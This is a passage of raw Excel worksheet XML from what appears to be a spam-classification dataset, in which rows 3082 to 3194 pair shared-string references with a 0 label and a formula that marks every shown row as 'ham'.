      <c r="B3082">
        <v>0</v>
      </c>
      <c r="C3082" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3083" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3083" t="s">
        <v>2504</v>
      </c>
      <c r="B3083">
        <v>0</v>
      </c>
      <c r="C3083" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3084" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3084" t="s">
        <v>2505</v>
      </c>
      <c r="B3084">
        <v>0</v>
      </c>
      <c r="C3084" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3085" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3085" t="s">
        <v>2506</v>
      </c>
      <c r="B3085">
        <v>0</v>
      </c>
      <c r="C3085" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3086" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3086" t="s">
        <v>2507</v>
      </c>
      <c r="B3086">
        <v>0</v>
      </c>
      <c r="C3086" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3087" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3087" t="s">
        <v>2508</v>
      </c>
      <c r="B3087">
        <v>0</v>
      </c>
      <c r="C3087" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3088" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3088" t="s">
        <v>2509</v>
      </c>
      <c r="B3088">
        <v>0</v>
      </c>
      <c r="C3088" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3089" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3089" t="s">
        <v>2510</v>
      </c>
      <c r="B3089">
        <v>0</v>
      </c>
      <c r="C3089" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3090" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3090" t="s">
        <v>2511</v>
      </c>
      <c r="B3090">
        <v>0</v>
      </c>
      <c r="C3090" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3091" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3091" t="s">
        <v>2512</v>
      </c>
      <c r="B3091">
        <v>0</v>
      </c>
      <c r="C3091" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3092" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3092" t="s">
        <v>2513</v>
      </c>
      <c r="B3092">
        <v>0</v>
      </c>
      <c r="C3092" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3093" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3093" t="s">
        <v>2514</v>
      </c>
      <c r="B3093">
        <v>0</v>
      </c>
      <c r="C3093" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3094" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3094" t="s">
        <v>2515</v>
      </c>
      <c r="B3094">
        <v>0</v>
      </c>
      <c r="C3094" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3095" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3095" t="s">
        <v>2516</v>
      </c>
      <c r="B3095">
        <v>0</v>
      </c>
      <c r="C3095" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3096" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3096" t="s">
        <v>2517</v>
      </c>
      <c r="B3096">
        <v>0</v>
      </c>
      <c r="C3096" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3097" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3097" t="s">
        <v>2518</v>
      </c>
      <c r="B3097">
        <v>0</v>
      </c>
      <c r="C3097" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3098" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3098" t="s">
        <v>2519</v>
      </c>
      <c r="B3098">
        <v>0</v>
      </c>
      <c r="C3098" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3099" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3099" t="s">
        <v>2520</v>
      </c>
      <c r="B3099">
        <v>0</v>
      </c>
      <c r="C3099" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3100" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3100" t="s">
        <v>2521</v>
      </c>
      <c r="B3100">
        <v>0</v>
      </c>
      <c r="C3100" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3101" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3101" t="s">
        <v>2522</v>
      </c>
      <c r="B3101">
        <v>0</v>
      </c>
      <c r="C3101" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3102" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3102" t="s">
        <v>2523</v>
      </c>
      <c r="B3102">
        <v>0</v>
      </c>
      <c r="C3102" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3103" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3103" t="s">
        <v>2524</v>
      </c>
      <c r="B3103">
        <v>0</v>
      </c>
      <c r="C3103" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3104" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3104" t="s">
        <v>2525</v>
      </c>
      <c r="B3104">
        <v>0</v>
      </c>
      <c r="C3104" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3105" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3105" t="s">
        <v>2526</v>
      </c>
      <c r="B3105">
        <v>0</v>
      </c>
      <c r="C3105" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3106" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3106" t="s">
        <v>2527</v>
      </c>
      <c r="B3106">
        <v>0</v>
      </c>
      <c r="C3106" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3107" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3107" t="s">
        <v>2528</v>
      </c>
      <c r="B3107">
        <v>0</v>
      </c>
      <c r="C3107" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3108" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3108" t="s">
        <v>2529</v>
      </c>
      <c r="B3108">
        <v>0</v>
      </c>
      <c r="C3108" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3109" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3109" t="s">
        <v>2530</v>
      </c>
      <c r="B3109">
        <v>0</v>
      </c>
      <c r="C3109" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3110" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3110" t="s">
        <v>2531</v>
      </c>
      <c r="B3110">
        <v>0</v>
      </c>
      <c r="C3110" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3111" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3111" t="s">
        <v>2532</v>
      </c>
      <c r="B3111">
        <v>0</v>
      </c>
      <c r="C3111" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3112" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3112" t="s">
        <v>2533</v>
      </c>
      <c r="B3112">
        <v>0</v>
      </c>
      <c r="C3112" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3113" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3113" t="s">
        <v>21</v>
      </c>
      <c r="B3113">
        <v>0</v>
      </c>
      <c r="C3113" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3114" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3114" t="s">
        <v>2534</v>
      </c>
      <c r="B3114">
        <v>0</v>
      </c>
      <c r="C3114" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3115" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3115" t="s">
        <v>2535</v>
      </c>
      <c r="B3115">
        <v>0</v>
      </c>
      <c r="C3115" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3116" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3116" t="s">
        <v>2536</v>
      </c>
      <c r="B3116">
        <v>0</v>
      </c>
      <c r="C3116" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3117" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3117" t="s">
        <v>2537</v>
      </c>
      <c r="B3117">
        <v>0</v>
      </c>
      <c r="C3117" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3118" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3118" t="s">
        <v>2538</v>
      </c>
      <c r="B3118">
        <v>0</v>
      </c>
      <c r="C3118" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3119" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3119" t="s">
        <v>2539</v>
      </c>
      <c r="B3119">
        <v>0</v>
      </c>
      <c r="C3119" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3120" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3120" t="s">
        <v>2540</v>
      </c>
      <c r="B3120">
        <v>0</v>
      </c>
      <c r="C3120" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3121" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3121" t="s">
        <v>2541</v>
      </c>
      <c r="B3121">
        <v>0</v>
      </c>
      <c r="C3121" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3122" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3122" t="s">
        <v>21</v>
      </c>
      <c r="B3122">
        <v>0</v>
      </c>
      <c r="C3122" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3123" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3123" t="s">
        <v>2542</v>
      </c>
      <c r="B3123">
        <v>0</v>
      </c>
      <c r="C3123" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3124" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3124" t="s">
        <v>2543</v>
      </c>
      <c r="B3124">
        <v>0</v>
      </c>
      <c r="C3124" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3125" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3125" t="s">
        <v>2544</v>
      </c>
      <c r="B3125">
        <v>0</v>
      </c>
      <c r="C3125" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3126" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3126" t="s">
        <v>2545</v>
      </c>
      <c r="B3126">
        <v>0</v>
      </c>
      <c r="C3126" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3127" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3127" t="s">
        <v>2546</v>
      </c>
      <c r="B3127">
        <v>0</v>
      </c>
      <c r="C3127" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3128" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3128" t="s">
        <v>2547</v>
      </c>
      <c r="B3128">
        <v>0</v>
      </c>
      <c r="C3128" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3129" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3129" t="s">
        <v>2548</v>
      </c>
      <c r="B3129">
        <v>0</v>
      </c>
      <c r="C3129" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3130" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3130" t="s">
        <v>21</v>
      </c>
      <c r="B3130">
        <v>0</v>
      </c>
      <c r="C3130" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3131" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3131" t="s">
        <v>2549</v>
      </c>
      <c r="B3131">
        <v>0</v>
      </c>
      <c r="C3131" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3132" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3132" t="s">
        <v>2550</v>
      </c>
      <c r="B3132">
        <v>0</v>
      </c>
      <c r="C3132" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3133" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3133" t="s">
        <v>2551</v>
      </c>
      <c r="B3133">
        <v>0</v>
      </c>
      <c r="C3133" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3134" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3134" t="s">
        <v>2552</v>
      </c>
      <c r="B3134">
        <v>0</v>
      </c>
      <c r="C3134" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3135" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3135" t="s">
        <v>2553</v>
      </c>
      <c r="B3135">
        <v>0</v>
      </c>
      <c r="C3135" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3136" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3136" t="s">
        <v>2554</v>
      </c>
      <c r="B3136">
        <v>0</v>
      </c>
      <c r="C3136" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3137" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3137" t="s">
        <v>2555</v>
      </c>
      <c r="B3137">
        <v>0</v>
      </c>
      <c r="C3137" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3138" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3138" t="s">
        <v>2556</v>
      </c>
      <c r="B3138">
        <v>0</v>
      </c>
      <c r="C3138" t="str">
        <f t="shared" ref="C3138:C3201" si="49">IF(B3138="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="3139" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3139" t="s">
        <v>2557</v>
      </c>
      <c r="B3139">
        <v>0</v>
      </c>
      <c r="C3139" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3140" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3140" t="s">
        <v>2558</v>
      </c>
      <c r="B3140">
        <v>0</v>
      </c>
      <c r="C3140" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3141" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3141" t="s">
        <v>2559</v>
      </c>
      <c r="B3141">
        <v>0</v>
      </c>
      <c r="C3141" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3142" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3142" t="s">
        <v>2560</v>
      </c>
      <c r="B3142">
        <v>0</v>
      </c>
      <c r="C3142" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3143" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3143" t="s">
        <v>2561</v>
      </c>
      <c r="B3143">
        <v>0</v>
      </c>
      <c r="C3143" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3144" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3144" t="s">
        <v>2562</v>
      </c>
      <c r="B3144">
        <v>0</v>
      </c>
      <c r="C3144" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3145" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3145" t="s">
        <v>2563</v>
      </c>
      <c r="B3145">
        <v>0</v>
      </c>
      <c r="C3145" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3146" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3146" t="s">
        <v>2564</v>
      </c>
      <c r="B3146">
        <v>0</v>
      </c>
      <c r="C3146" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3147" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3147" t="s">
        <v>2565</v>
      </c>
      <c r="B3147">
        <v>0</v>
      </c>
      <c r="C3147" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3148" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3148" t="s">
        <v>2566</v>
      </c>
      <c r="B3148">
        <v>0</v>
      </c>
      <c r="C3148" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3149" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3149" t="s">
        <v>2567</v>
      </c>
      <c r="B3149">
        <v>0</v>
      </c>
      <c r="C3149" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3150" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3150" t="s">
        <v>2568</v>
      </c>
      <c r="B3150">
        <v>0</v>
      </c>
      <c r="C3150" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3151" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3151" t="s">
        <v>2569</v>
      </c>
      <c r="B3151">
        <v>0</v>
      </c>
      <c r="C3151" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3152" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3152" t="s">
        <v>2570</v>
      </c>
      <c r="B3152">
        <v>0</v>
      </c>
      <c r="C3152" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3153" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3153" t="s">
        <v>2571</v>
      </c>
      <c r="B3153">
        <v>0</v>
      </c>
      <c r="C3153" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3154" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3154" t="s">
        <v>2572</v>
      </c>
      <c r="B3154">
        <v>0</v>
      </c>
      <c r="C3154" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3155" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3155" t="s">
        <v>2573</v>
      </c>
      <c r="B3155">
        <v>0</v>
      </c>
      <c r="C3155" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3156" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3156" t="s">
        <v>2574</v>
      </c>
      <c r="B3156">
        <v>0</v>
      </c>
      <c r="C3156" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3157" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3157" t="s">
        <v>2575</v>
      </c>
      <c r="B3157">
        <v>0</v>
      </c>
      <c r="C3157" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3158" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3158" t="s">
        <v>2576</v>
      </c>
      <c r="B3158">
        <v>0</v>
      </c>
      <c r="C3158" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3159" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3159" t="s">
        <v>2577</v>
      </c>
      <c r="B3159">
        <v>0</v>
      </c>
      <c r="C3159" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3160" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3160" t="s">
        <v>2578</v>
      </c>
      <c r="B3160">
        <v>0</v>
      </c>
      <c r="C3160" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3161" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3161" t="s">
        <v>2579</v>
      </c>
      <c r="B3161">
        <v>0</v>
      </c>
      <c r="C3161" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3162" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3162" t="s">
        <v>2580</v>
      </c>
      <c r="B3162">
        <v>0</v>
      </c>
      <c r="C3162" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3163" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3163" t="s">
        <v>2581</v>
      </c>
      <c r="B3163">
        <v>0</v>
      </c>
      <c r="C3163" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3164" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3164" t="s">
        <v>2582</v>
      </c>
      <c r="B3164">
        <v>0</v>
      </c>
      <c r="C3164" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3165" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3165" t="s">
        <v>2583</v>
      </c>
      <c r="B3165">
        <v>0</v>
      </c>
      <c r="C3165" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3166" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3166" t="s">
        <v>2584</v>
      </c>
      <c r="B3166">
        <v>0</v>
      </c>
      <c r="C3166" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3167" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3167" t="s">
        <v>2585</v>
      </c>
      <c r="B3167">
        <v>0</v>
      </c>
      <c r="C3167" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3168" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3168" t="s">
        <v>2586</v>
      </c>
      <c r="B3168">
        <v>0</v>
      </c>
      <c r="C3168" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3169" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3169" t="s">
        <v>2587</v>
      </c>
      <c r="B3169">
        <v>0</v>
      </c>
      <c r="C3169" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3170" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3170" t="s">
        <v>2588</v>
      </c>
      <c r="B3170">
        <v>0</v>
      </c>
      <c r="C3170" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3171" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3171" t="s">
        <v>2589</v>
      </c>
      <c r="B3171">
        <v>0</v>
      </c>
      <c r="C3171" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3172" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3172" t="s">
        <v>2590</v>
      </c>
      <c r="B3172">
        <v>0</v>
      </c>
      <c r="C3172" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3173" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3173" t="s">
        <v>2591</v>
      </c>
      <c r="B3173">
        <v>0</v>
      </c>
      <c r="C3173" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3174" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3174" t="s">
        <v>2592</v>
      </c>
      <c r="B3174">
        <v>0</v>
      </c>
      <c r="C3174" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3175" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3175" t="s">
        <v>2593</v>
      </c>
      <c r="B3175">
        <v>0</v>
      </c>
      <c r="C3175" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3176" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3176" t="s">
        <v>2594</v>
      </c>
      <c r="B3176">
        <v>0</v>
      </c>
      <c r="C3176" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3177" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3177" t="s">
        <v>2595</v>
      </c>
      <c r="B3177">
        <v>0</v>
      </c>
      <c r="C3177" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3178" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3178" t="s">
        <v>2596</v>
      </c>
      <c r="B3178">
        <v>0</v>
      </c>
      <c r="C3178" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3179" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3179" t="s">
        <v>2597</v>
      </c>
      <c r="B3179">
        <v>0</v>
      </c>
      <c r="C3179" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3180" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3180" t="s">
        <v>2598</v>
      </c>
      <c r="B3180">
        <v>0</v>
      </c>
      <c r="C3180" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3181" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3181" t="s">
        <v>2599</v>
      </c>
      <c r="B3181">
        <v>0</v>
      </c>
      <c r="C3181" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3182" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3182" t="s">
        <v>2600</v>
      </c>
      <c r="B3182">
        <v>0</v>
      </c>
      <c r="C3182" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3183" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3183" t="s">
        <v>2601</v>
      </c>
      <c r="B3183">
        <v>0</v>
      </c>
      <c r="C3183" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3184" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3184" t="s">
        <v>2602</v>
      </c>
      <c r="B3184">
        <v>0</v>
      </c>
      <c r="C3184" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3185" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3185" t="s">
        <v>2603</v>
      </c>
      <c r="B3185">
        <v>0</v>
      </c>
      <c r="C3185" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3186" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3186" t="s">
        <v>2604</v>
      </c>
      <c r="B3186">
        <v>0</v>
      </c>
      <c r="C3186" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3187" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3187" t="s">
        <v>2605</v>
      </c>
      <c r="B3187">
        <v>0</v>
      </c>
      <c r="C3187" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3188" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3188" t="s">
        <v>2606</v>
      </c>
      <c r="B3188">
        <v>0</v>
      </c>
      <c r="C3188" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3189" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3189" t="s">
        <v>2607</v>
      </c>
      <c r="B3189">
        <v>0</v>
      </c>
      <c r="C3189" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3190" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3190" t="s">
        <v>2608</v>
      </c>
      <c r="B3190">
        <v>0</v>
      </c>
      <c r="C3190" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3191" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3191" t="s">
        <v>21</v>
      </c>
      <c r="B3191">
        <v>0</v>
      </c>
      <c r="C3191" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3192" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3192" t="s">
        <v>2609</v>
      </c>
      <c r="B3192">
        <v>0</v>
      </c>
      <c r="C3192" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3193" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3193" t="s">
        <v>2610</v>
      </c>
      <c r="B3193">
        <v>0</v>
      </c>
      <c r="C3193" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3194" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3194" t="s">
        <v>2611</v>
      </c>
      <c r="B3194">
        <v>0</v>
      </c>
      <c r="C3194" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
